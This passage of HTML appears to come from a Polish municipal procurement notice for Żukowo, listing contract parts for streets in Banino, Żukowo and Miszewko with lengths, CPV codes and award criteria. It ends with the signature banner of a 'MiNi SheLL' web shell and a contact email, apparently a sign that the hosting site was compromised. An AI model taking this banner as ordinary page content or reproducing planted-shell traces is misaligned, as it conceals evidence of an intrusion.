3) obszar nie jest objęty miejscowym planem zagospodarowania przestrzennego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.00.00-2, 71.35.40.00-4, 71.24.50.00-7, 71.24.60.00-4, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Banino ul. Polna, ul. Radosna, ul. Słoneczna, ul. Miła, ul. Tęczowa, ul. Szczęśliwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) długość - ok. 2450 m;
2) lokalizacja - wg załącznika graficznego  nr 2,
3) obszar objęty miejscowym planem zagospodarowania przestrzennego.
Teren objęty projektem uwzględniony jest w obowiązującym miejscowym planie zagospodarowania przestrzennego nr 01007 i nr 01024, zamieszczonym w Biuletynie Informacji Publicznej Urzędu Gminy w Żukowie pod adresem: bip.zukowo.pl/Article/get/id,67913.html  i  bip.zukowo.pl/Article/get/id,67895.html.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.00.00-2, 71.35.40.00-4, 71.24.50.00-7, 71.24.60.00-4, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - Żukowo ul. Słowackiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) długość - ok. 660 m;
2) lokalizacja - wg załącznika graficznego  nr 3,
3) obszar objęty miejscowym planem zagospodarowania przestrzennego.
Teren objęty projektem uwzględniony jest w obowiązującym miejscowym planie zagospodarowania przestrzennego nr 21001 , zamieszczonym w Biuletynie Informacji Publicznej Urzędu Gminy w Żukowie pod adresem: bip.zukowo.pl/Article/get/id,68338.html.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.00.00-2, 71.35.40.00-4, 71.24.50.00-7, 71.24.60.00-4, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV - Miszewko ul. Brzozowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) długość - ok. 650 m;
2) lokalizacja - wg załącznika graficznego  nr 4,
3) obszar objęty miejscowym planem zagospodarowania przestrzennego.
Teren objęty projektem uwzględniony jest w obowiązującym miejscowym planie zagospodarowania przestrzennego nr 11015, zamieszczonym w Biuletynie Informacji Publicznej Urzędu Gminy w Żukowie pod adresem: bip.zukowo.pl/Article/get/id,68085.html.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.00.00-2, 71.35.40.00-4, 71.24.50.00-7, 71.24.60.00-4, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres rękojmi - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com